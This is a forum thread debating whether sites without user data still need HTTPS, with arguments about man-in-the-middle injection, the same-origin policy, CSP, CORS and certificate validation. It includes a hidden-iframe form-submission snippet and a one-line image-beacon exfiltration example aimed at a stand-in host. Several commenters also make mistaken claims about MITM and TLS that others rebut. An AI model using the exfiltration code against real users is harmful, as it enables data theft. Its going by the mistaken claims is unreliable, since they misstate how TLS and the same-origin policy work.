  Refused to display 'https://www.cnn.com/' in a frame because an ancestor violates the following Content Security Policy directive: "frame-ancestors 'self' https://*.cnn.com:* http://*.cnn.com https://*.cnn.io:* http://*.cnn.io:* *.turner.com:* courageousstudio.com".
Cross origin still applies. This is not something the browser will let you bypass.

Here is the code I tested with:

  var f = document.createElement("iframe");
  f.style.display = "none";
  document.body.appendChild(f);
  var f_doc = f.contentDocument;
  f_doc.getElementsByTagName("body")[0].innerHTML =
    "<form method='post' action='https://cnn.com'></form>";
  f_doc.getElementsByTagName("body")[0].getElementsByTagName("form")[0].submit();
  f_doc = null;
I know everybody on here is a CCIE, CISSP, and a client side JavaScript expert, but I promise none of these violations work. If they did work the malicious actor would be stealing far more than simple form data and the web would be completely broken.

HTTPS is important because it prevents data from moving across the wire as plain text for everybody to see. It isn't magic.

https://en.wikipedia.org/wiki/Content_Security_Policy


That isn't the SOP stopping this from working—it's CSP.

And CSP vitally is opt-in: if I've performed a MITM attack on example.com I can send whatever CSP header I want, and I obviously control evil.com and therefore can send whatever CSP header I want there.

There are two things that stop that (from here to https://cnn.com) from working: firstly, HN sets:

    Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ https://cdnjs.cloudflare.com/; frame-src 'self' https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline'
The vital part here is "frame-src 'self' https://www.google.com/recaptcha/": this allows only two sources to be embedded within a frame (the current origin, i.e., https://news.ycombinator.com/ and the exact path https://www.google.com/recaptcha/).

I can't actually see that CSP header you're getting on https://cnn.com/ (probably because I immediately get redirected to their international edition, which sets a very different CSP header!), but your quote of the error message says what you need to know: it sets a "frame-ancestors" policy (i.e., it can't be put inside a frame except from those sources).

But again—CSP is opt-in, if I control http://example.com and http://evil.com (either directly or through a MITM) I can control what CSP header gets sent on both and therefore CSP provides no defence against such an attack (it does, however, provide a defence-in-depth against XSS and similar attacks, as it makes such an attack as this impossible).

As some evidence the SOP doesn't prevent form submission: https://developer.mozilla.org/en-US/docs/Web/Security/Same-o... says "Cross-origin writes are typically allowed. Examples are links, redirects and form submissions."

If you want more detail about such a thing working, you can follow the form submission algorithm in all of its gory detail: https://html.spec.whatwg.org/multipage/form-control-infrastr...

If you want my promise, as someone who's worked on browsers for around a decade, often around JS and DOM, and dealt with some of the triaging of crossfuzz issues, this absolutely does not violate the SOP and does work with no CSP headers in use.


SOP has the security properties of a piece of wet cardboard. That is, most attackers will refrain because punching wet cardboard gets them wet and covered in slimy cardboard, some will punch it extra hard for the same reasons.


How is the same origin policy helping when the attacker is impersonating your domain to the target?


How would the attacker impersonate your domain? They would need configuration access to a router in the path to perform DNS actions in order to accomplish this. If they had that, they would have their eye on much bigger prizes than merely impersonating an Apache server. If they did actually have that, they could impersonate your domain, your site content, and your HTTPS trust with a spoofed cert. In that case HTTPS is more harm than good because you are still completely compromised, but with a false trust relationship.


DNS cache poisoning happens at a surprising rate. I had Verizon FIOS's DNS serve the wrong IP address for "www.google-analytics.com" before, for over 6 hours. The IP they returned for that hostname was located in Israel, and was serving up malware in the analytics.js script on any page that included it.

Luckily www.google-analytics.com is HSTS preloaded, and the cert the attacker served wasn't signed, so the request was blocked.

But now imagine that instead of doing that to www.google-analytics.com, they did it to yoursite.com, but you don't have HTTPS enabled, so they are free to send whatever scripts they want to your users, return whatever data they want to their server (which the users' computers think is yoursite.com), and can even do a 301 redirect to their own domain after the initial attack to make sure they can keep unsuspecting victims under their control for long after their DNS cache poisoning gets fixed.


> They would need configuration access to a router in the path to perform DNS actions in order to accomplish this.

Nope, they just need to poison its ARP cache. You can do that easily with a tool like Ettercap, if the router is in the same LAN as your machine. Every request (DNS, HTTP, etc) from the victim machine will now go to yours, and you control the responses it gets.

Note that they aren't impersonating the domain to the whole world (hence they can't get a valid certificate, since no CA will accept their request), only to a local computer.


ARP cache poisoning occurs at the switch not the router. It is an awesome form of attack, but access to the switch and the availability of that compromise are limited in scope. A single switch can only have so many machines connected even with VLANs. It also requires access from within the local LAN.

I really don't think anybody is thinking of ARP poisoning when all these comments here mention public facing MiTM attacks merely because a page is served with HTTP instead of HTTPS. Since ARP is only layer 3 it really doesn't care if the page is sent via HTTPS and works the same either way.


ARP poisoning is just an example of a very simple and easy attack that can affect anyone that ever uses a public hotspot - on a cafe, university, workplace, etc.

Another possibility - compromising home routers: https://arstechnica.com/information-technology/2018/05/hacke...

Other possible attacks would be to compromise an internal router at an office (affecting everyone up to the CEO), controlling a VPN or Tor exit node, etc.

None of these give you the possibility of creating your own cert, but they do give you enough MITM access to fully compromise an HTTP site.

> Since ARP is only layer 3 it really doesn't care if the page is sent via HTTPS and works the same either way.

The attack works in the sense that the traffic starts flowing through the attacker's machine, but the attacker is still prevented from changing anything in the page. That's the whole point of SSL/TLS.



CSRF works the same whether the site is served via HTTP or HTTPS. CSRF attacks the server from the client, so HTTPS doesn't protect from this. HTTPS is an end-to-end encrypted tunnel.


It's trivial to hijack an unencrypted connection to inject anything.


> One very serious argument that HTTPS evangelists avoid is when there is no content to protect the security benefits of HTTPS evaporate.

If there is no content, you have no site, so the issue is moot.

> My site is a web application that stores all user data in their browser. Their data does not come back to the server. The only thing that crosses the wire is a request for the application code and a response with that code.

The application is content, and the thing you need HTTPS to protect. Otherwise, the application the user actually runs could be anything an attacker wants.

> I would argue this model of application is substantially more secure that sending data across the wire regardless of whether that transmission is encrypted.

It's not, because the code you send controls what happens with the data.

> A man in the middle attack can void the integrity of data crossing the wire, but it cannot trivially break privacy with simple modifications to code.

It can, because in an MITM the attacker impersonates your site. They therefore can bypass any protection offered by the same origin policy, because they own your origin.


> if there is no content, you have no site, so the issue is moot.

That isn’t true either as TLS protects http headers in addition to the http body.

Modification of requested content does not void the same origin policy. Just because you could modify page content does not mean you could transmit that content to an alternate location.


> Just because you could modify page content does not mean you could transmit that content to an alternate location.

Yes, if I can masquerade as your domain, I can have the data transmitted back to the same server conducting the attack (which is the “same origin”), which can then send it anywhere else.


> Yes, if I can masquerade as your domain

How would you do that? If you could do that you could also masquerade the HTTPS connection and simply run HTTPS at the spoofed server using the spoofed X.509 cert from the legitimate web server.


You can't "spoof" a cert, that's its whole point. If you create a new one, it won't have a valid signature, and if you copy the original, you won't have the associated private key to create valid responses.


https://www.computerworld.com/article/2897815/microsoft-blac...

To be more clear a malicious website can rely on fraudulently issued certificates to validate a spoofed domain. This is a bad cert that appears to be valid and establishes the same level of trust. That is why revocation lists and OCSP are necessary.


> My site is a web application that stores all user data in their browser. Their data does not come back to the server.

If you weren't using HTTPS a very simple MitM attack would send all of that data straight to any server. HTTPS doesn't just prevent intercepting AJAX communications, it prevents anyone from changing your webapp (js file) into something that uploads everything to evilcorp.com.



Ohh I dunno. Lets say you're running a non-HTTPS site and an attacker MITMs one of your users and injects JavaScript which will appear to come from your site into that users session.

At that point the attacker can use that JavaScript to send your user's data to another server under their control, same origin won't help, as the JavaScript will appear to come from your site.


Uh, a MiTM will just show an entire fake site, or it can drop your content and just send a redirect header to any website it wants.


Man in the middle attacks allow an attacker to read data over the wire. It does not mean the attacker can modify that data. It certainly doesn't mean the attacker can move traffic to a different end point.


Usually man in the middle attack refers to an attack where someone controls a connection between you and the server and is able to freely control the connection including modifying or completely fabricating any packets coming through. Your ISP and whoever controls the wifi router you connect to can modify any data coming through like this.


Uh, MiTM can modify traffic, tools to do that have been around at least 2 decades.



Which you've noted three times but is just as wrong the third time as the first. You can break/disable SOP when it's trivially easy to edit the code.


> You can break/disable SOP when it's trivially easy to edit the code.

How? SOP isn't related to the code. It is only concerned with the page address.


The point is that you can put the code wherever you want, including inside the same origin context (e.g. right in the main HTML).


Same-origin is the other way around, it protects evilcorp.com from being called by non-https.com. So a simple CORS setup on evilcorp.com would indeed allow you to send all user data by MITMing non-https.com


CORS allows a site to bypass same origin policy according to a whitelist specified in the corresponding HTTP header. The setup on evil.com is irrelevant. CORS must be instantiated from the server sending the page.

https://en.wikipedia.org/wiki/Cross-origin_resource_sharing


No. From your link: "Note that in the CORS architecture, the ACAO header is being set by the external web service (service.example.com), not the original web application server (www.example.com). CORS allows the external web service to authorise the web application to use its services and does not control external services accessed by the web application."


How does same-origin policy (on a MITM'd website) prevent this?

    (new Image()).src = 'https://example.com/data.php?payload=' + JSON.stringify(data);


It doesn't, because same-origin protects data on example.com, not on the embedding page (in your example). It is not a security measure that aims to prevent the issue mentioned by the grandparent post.



> The only thing that crosses the wire is a request for the application code and a response with that code.

If someone man-in-the-middled the downloading of the app code (trivial, if not HTTPS), then none of those constraints you later mention would be true and the user’s data is now compromised.


In the case described there is no user data crossing the wire to compromise. Secondly, a man in the middle attack is only valid (in this case) if you want to modify the application code in transit to corrupt the application itself. This is defacement and nontrivial. Finally, you cannot use this form of attack to break privacy. Others on here have attempted examples, but they have all failed.

If you can break same origin policy submit a bug to Google. That would be a significant defect that would warrant their top tier bug bounty.

https://en.wikipedia.org/wiki/Man-in-the-middle_attack


If the app code goes over HTTP, it makes zero difference if you send data or not in your app. Not exactly the same scenario, but very close to my point is a situation a while back where JavaScript was injected into non-SSL web traffic that was used to DDoS Github[0].

Seriously, use HTTPS for everything. Not to be rude at all (seriously!), but it’s pretty obvious by this thread and the other you linked to that you don’t have the knowledge/experience on this topic, so do your users a favor and trust when I say you need to be using HTTPS.

[0] https://www.theregister.co.uk/2015/03/27/github_under_fire_f...


There is no user data crossing the wire. You are instead sending code that the user will execute. An attacker can substitute literally any code they wish. This new code can collect user data and send it over the wire literally anywhere.

SOP offers zero protection against this. Just load evil.com?data=XYZ in an iframe.



> Others on here have attempted examples, but they have all failed.

Where? I’m happy to prove the attack vector if necessary, would be trivial for me to do if the app is designed the way you described it (and no, not eligible for any Google bounty as this has nothing to do with same origin policy).


If you don't use HTTPS you are also forgoing the integrity check and not only the encryption. Any router standing between your users and your servers could inject anything into your code, html, etc.


There's a corner case where, surprisingly, your parent's point kinda works, SRI:

https://developer.mozilla.org/en-US/docs/Web/Security/Subres...

If a site exists just to host resources protected with SRI then you can in principle use HTTP, the resource integrity protection will fire and so long as the main page's origin was genuine (e.g. protected with HTTPS) you come out OK...

But SRI isn't even implemented at all in Safari or IE. So, there's a good chance if you have Mac or Windows users they're screwed.

This really is a corner case, even if some day Safari and IE get SRI, you should always just use HTTPS to actually protect resources in flight. The purpose of SRI is more around not fully trusting a sub-resource you've intentionally linked not to be changed.


Right, but you still need HTTPS for the main domain.


There is the possibility of corrupting the integrity of the application code in this way, but this doesn't void privacy thanks to the same origin policy. https://en.wikipedia.org/wiki/Same-origin_policy

If integrity of the application is violated the application is broken or defective. Fortunately the application is open source and so integrity violations can be easily verified. More fortunately still the application is a diff tool, so it can perform self validation across the wire by comparing the transmitted application code against the stored application code.


> Fortunately the application is open source and so integrity violations can be easily verified. More fortunately still the application is a diff tool, so it can perform self validation across the wire by comparing the transmitted application code against the stored application code.

It could, if you had any guarantee that the application code was not compromised the first time, and if you had a customized browser that responded to a navigation request by checking for and running the stored application code for the URL to decide whether or not to use the downloaded code. But that's not the way browsers normally work.

Furthermore, even if it was, the case of “a web application hooks into the web request lifecycle to guarantee that its code can never be changed once first loaded, and which stores all user data locally” is an unusual-enough case (if even possible to implement) that there is a good reason the always-HTTPS crowd doesn't address it: it's simply not a case with any real-world relevance. At that point, sure, you don't need HTTPS after the initial download, because you don't need web requests at all since you are effectively unconditionally throwing away the response in favor of locally stored code.


I may be misunderstanding, but I don't believe the same-origin policy will protect you there. Your browser wouldn't be able to tell whether the JS it's reading is the real one or the modified one. So it would be all "same origin" to it.

It won't stop a modified code from pushing data to anywhere in the web either.

> More fortunately still the application is a diff tool, so it can perform self validation

Yes, if the application has been loaded before but I feel like it would be a half-baked HSTS implementation.

Edit: it was too convoluted


Also if the attack did take place at the router then HTTPS certainly is irrelevant regardless of what the browser is doing. HTTP and HTTPS ride over TCP. If you can modify code at the router then you can change the TCP packets to spoof the page address or HTTP response and sidestep HTTPS or the requested domain entirely.

https://en.wikipedia.org/wiki/Transport_Layer_Security

Simply modify the TCP connection in transit to return TLS-encrypted data other than what the user asked for. Really, if you are already at the router you can essentially do anything to the user's traffic and modify it in any way except read encrypted data. Simply redirect the user to a spoofed domain with a spoofed page running malicious code sent as HTTPS. Then you can gather all the privacy data you want through HTTPS.


The guarantee TLS provides is not that content is unable to be modified, but that any modifications are detectable.

The router (or anything else between your computer and the server) can modify the content in transport to its heart's content, but it won't be able to sign it with the domain's private key, and so the browser will always know when such modifications have taken place and flag them as malicious.


That is true after the certificate chain is validated by the browser, but not before. A malicious router attack could just as easily modify the initial http request so that the user is directed to the domain on a spoofed IP before any HTTPS trust validation takes place. The malicious http server would also have to spoof the original cert though, but then they get malicious trusted https on the trusted domain that returns similar-looking code.


It doesn't matter. The browser can use the SSL certificate and the corresponding public key to verify that the contents of the connection originated from the server at the domain it expects. Unless the server's private key or browser's root certificates are compromised, the connection cannot be spoofed without being detected.


You really didn't read what I wrote. If the malicious site uses the valid domain and a spoofed cert for that domain, the browser cannot tell the difference and will establish the very same trust. The browser has no way of knowing if the requested domain is hosted from the appropriate IP address. This is all handled by the DNS system. DNS lookups and caching are not a function of the browser.

Perhaps you will take it more seriously if it comes from Wikipedia: https://en.wikipedia.org/wiki/Certificate_authority#Validati...


I did read what you wrote, but it's incorrect because you can't create a valid certificate for a domain you don't control.

> If the malicious site uses the valid domain and a spoofed cert for that domain it cannot tell the difference and will establish the very same trust. The browser has no way of knowing if the requested domain is hosted from the appropriate IP address.

In your scenario, the browser receives the spoofed certificate. The domain matches, but when it checks the certificate chain against its root certificates, it can't find a matching signature. Because of this, the browser knows the certificate hasn't been signed by a certificate authority it trusts, and it throws up that warning page about visiting an unsafe site.

Your Wikipedia article (and my earlier caveat about the server's private key being compromised) refers not to spoofing a cert, but to the CA being tricked into signing a certificate for a party who doesn't control the domain:

> In particular, it is always vulnerable to attacks that allow an adversary to observe the domain validation probes that CAs send.

In this case, requests to that specific domain would be vulnerable to man-in-the-middle attacks. However, it's outside the scope of TLS, which only ensures security in transport when neither the client nor the server have been compromised; it has nothing to do with securing private keys or verifying control of a domain in the first place.


Spoofed certs are difficult, especially if you lock out CAs like Let's Encrypt via DNS CAA records.


> A malicious router attack could just as easily modify the initial http request so that the user is directed to the domain on a spoofed IP before HTTPS trust violation.

If the initial request is HTTPS, everything is validated, and a spoofed redirect is impossible.


At a high level this is true, but in practice it's not what's happening, TLS 1.3 makes this tidier so let's use that example:

1. Alice proposes to send encrypted messages to Bob, she hopes this first, unencrypted, message reaches Bob (but if it doesn't she'll be fine, except that she reveals she wanted to talk to Bob) and it has a Diffie-Hellman Key Share inside it which is just basically a number Alice got by doing some mathematics on a (different) random number that Alice never tells anybody, even Bob.

2. Somebody receives Alice's message, they do the other half of the Diffie-Hellman Key Share, and send that to Alice. Both this somebody and Alice now (thanks to DH) have a set of symmetric encryption keys nobody else knows. So using symmetric encryption they immediately have an encrypted channel between Alice and whoever somebody is.

3. The somebody sends Bob's certificate over the encrypted channel. But Bob's certificate is a public document, it does NOT prove this is Bob.

4. If this is really Bob he wraps up everything they both said so far (message from Alice, reply from Bob, sending back a certificate etcetera) and Signs that with his private key which is paired with the public key inside his certificate. He sends the signature to Alice over the encrypted channel. He _could_ also demand a certificate & signature from Alice at this point but on the web basically nobody does this.

5. Now Alice knows this is really Bob and can safely send messages on the encrypted channel to Bob.

There's no need for any messages to be signed with Bob's key after step 4, all messages are protected with the symmetric encryption keys agreed in steps 1 & 2.

Simply "flagging" things if they're apparently changed isn't good enough, bad guys can use this to create an "Oracle" which destroys security eventually. Instead modern TLS with AEAD will simply abort the entire connection after decrypting a message which has been tampered with, and (correct implementations of) TLS refuse to give you partially decrypted messages, either the whole message arrives and is decrypted successfully, or it hasn't and you can't have the data. Thus an adversary learns nothing from tampering: They know they tampered with the message, and it's not a surprise this blew up the connection - doing it again, and again, and again teaches them nothing further.

If you want to see how it could go wrong otherwise, check out videos of "Lucky Thirteen", which gradually guesses bits of data your browser is willing to send repeatedly over HTTPS connections while it improves the guess (e.g. cookies). A modern browser mitigates this attack by making the timing involved impractical, but AEAD is better.


It's far more common for this to happen beyond the router. A few years ago there was a spate of ISPs injecting ads onto sites they don't control, because HTTP doesn't prevent them from doing so. HTTPS does.


I remember that and defacement is a valid and important concern. This is probably the most realistic and valid concern raised here.

These attacks would work well for advertising because the ISP would inject an iframe into the page that sources unique content and beacons data back to the source of the iframe. This breaks anonymity, but it doesn't break privacy since the code in the iframe cannot access the surrounding page.


That's not how TLS works: your browser has a list of CAs (certificate authorities) it trusts, and unless a CA has gone rogue (which has happened before), you can't change traffic and make it appear to come from someone else (read up on public-key signing).


Where is the key signed? It is signed at the web server providing the HTTPS response. It isn't signed by the CA. The CA provides a digital signature to the certificate to validate the certificate using cryptography (X.509 standard). Digital signature algorithms are very different from the encryption algorithms used in the PKI model.

Wikipedia also explains this limitation with regard to breaking DNS: https://en.wikipedia.org/wiki/Certificate_authority


What's your point? The CA's certificate is used during the signing part of the hash calculation.


A malicious router (or any entity between you and the site you're trying to connect to) redirecting your traffic is the exact situation that HTTPS protects against.


It does not. Redirection from the router involves only TCP and DNS actions. HTTPS does not encrypt TCP. HTTPS is an encrypted tunnel that rides over TCP. HTTPS is a layer 7 protocol while TCP is a layer 4 protocol. You can encrypt TCP as well if you are using IPSEC. IPSEC is built into IPv6 by default, but it fails with NAT over IPv4, which is still most of the internet.

None of that is what HTTPS is for though. The primary function of HTTPS is to prevent HTTP traffic from being sent in the clear so that anybody could read it.


If the user is trying to access https://example.com, and an attacker redirects the TCP connection (or fakes a response to the DNS query so the user gets the wrong IP address) to a server that doesn't have the private key for example.com's HTTPS certificate, then the HTTPS connection will fail. The attacker is unable to serve their own content to the user as "https://example.com". HTTPS doesn't just encrypt the connection, but also authenticates the integrity of connections as being from the domain they claim to be from.


https://www.computerworld.com/article/2897815/microsoft-blac...

Spoofing a certificate isn't trivial but fraudulent certificates are a thing. This is why there are revocation lists and OCSP.


Well, the Same origin policy may protect the users a bit if the attack takes place after they've downloaded the app, but if they haven't - the attacker can modify it and they won't even notice.


I'm going to sorta break the prime directive and link the n-gate rebuttal to these articles: http://archive.fo/xcQ5j

It's a bit heavy-handed, but it does bring up a good point: a lot of this argument for HTTPS-by-default rests on assumptions about who is responsible for data security. We're doing a lot and things are improving, but the general public is still yelling at websites for misusing data that we willingly gave over in the first place [0].

[0]: https://xkcd.com/743/


> assumptions about who is responsible for data security.

The chief assumption appears to be "anyone but the browser vendors". Let us consult the article:

  BeEF
  This, to me, was the most impactful demo
Quite the endorsement. So what's BeEF's angle?

"...examines exploitability within the context of the one open door: the web browser."

There could hardly be a clearer expression of contempt for the browser vendors' offerings. But remember, the "open door" is nothing to do with them, it's all your fault for not serving via HTTPS.

Welcome to Clown World.


Eh, there are two execution contexts here.

1. The web browser executing the injected data stream it receives from the remote computer.

2. Your brain interpreting 'non-executable' instructions as received from your browser.

Browser security has nothing to do with me going to 'xyz.com', which is the trusted website for xyz company, and being fed a MiTM telling me to go to a bad phone number for support.


The fact that the site gets "erased" partway down, as if attacked by an evil MiTM, proves it's not serious and is, in fact, arguing for HTTPS.



